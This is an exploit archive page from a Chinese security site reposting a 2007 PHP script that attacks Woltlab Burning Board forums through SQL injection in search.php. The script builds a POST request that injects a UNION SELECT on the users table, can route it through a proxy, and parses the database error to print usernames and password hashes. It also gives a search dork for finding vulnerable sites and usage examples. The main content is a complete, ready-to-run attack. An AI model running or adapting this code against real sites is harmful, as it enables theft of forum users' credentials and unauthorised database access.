首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Woltlab Burning Board <= 1.0.2, 2.3.6 search.php SQL Injection Exploit
来源:http://www.undergroundagents.de 作者:silent 发布时间:2007-01-18  

<?php

/*
###################################
# http://www.undergroundagents.de #
# coded by silent vapor #
# webmaster@undergroundagents.de #
###################################
*/

print_r('
--------------------------------------------------------------------------------
Woltlab Burning Board Lite <= 1.0.2 GetHashes over search.php
Woltlab Burning Board <= 2.3.6 GetHashes over search.php
by silent vapor (webmaster@undergroundagents.de)
site: http://www.undergroundagents.de
dork: "Powered by Burning Board Lite 1.0.2" or
"Powered by Burning Board 2.3.6"
--------------------------------------------------------------------------------
');

if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path boardid searchstring OPTIONS
host: target server (ip/hostname)
path: path to wbblite
boardid: a boardid where you will search
searchstring: a searchstring, that will be found in this board

Options:
-o[prefix]: " a table prefix (default: bb1_)
-p[port]: " a port other than 80
-P[ip:port]: " a proxy
-t[n]: " adjust query timeout (default: 10)

Example:
php '.$argv[0].' localhost /wbblite/ 28 avatar
" " localhost / 29 cpu -p81 -P127.0.0.1:8080
--------------------------------------------------------------------------------
');
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$boardid=$argv[3];
$searchstring=$argv[4];

$prefix = "bb1_";
$port=80;
$timeout=10;
$proxy="";

for ($i=5; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-t")
{
$timeout=(int) str_replace("-t","",$argv[$i]);
}
if ($temp=="-o")
{
$prefix=str_replace("-o","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
$path .= "search.php";
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$boardids="boardids%5B%5D=$boardid) UNION SELECT username,password FROM ".$prefix."users WHERE 1 NOT IN (0,0";
$data = "searchstring=$searchstring&searchuser=&name_exactly=1&$boardids&showposts=0&searchdate=0";
$data .= "&beforeafter=after&sortby=lastpost&sortorder=desc&send=send&submit=Suchen";

$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: wbb_userpassword=0;\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;

sendpacketii($packet);

if (eregi("Database error",$html)){
echo "<b>vulnerable...</b><br><br>";
$temp1=explode("b.boardid IN (",$html);
$temp2=explode(")",$temp1[1]);
$temp3=explode("&sid=",$temp2[0]);
$temp4=$temp3[0];
$temp5=explode(",",$temp4);

for ($i=0;$i<count($temp5);$i++)
{
if ($i%2 == 0)
echo $temp5[$i]." ( Hash: ";
else
echo $temp5[$i].")<br>";
}
}

?>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CCRP Folder Treeview Control (
·Woltlab Burning Board <= 1.
·MGB 0.5.4.5 (email.php id vari
·Woltlab Burning Board <= 1.
·Sami FTP Server 2.0.2 (USER/PA
·MS Internet Explorer VML Downl
·MS Internet Explorer VML Remot
·Microsoft Help Workshop 4.03.0
·Mac OS X 10.4.8 Overwrite Setu
·迅雷5 ThunderAgent Module 远程
·KGB <= 1.9 (sesskglogadmin.
·BrowseDialog Class (ccrpbds6.d
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved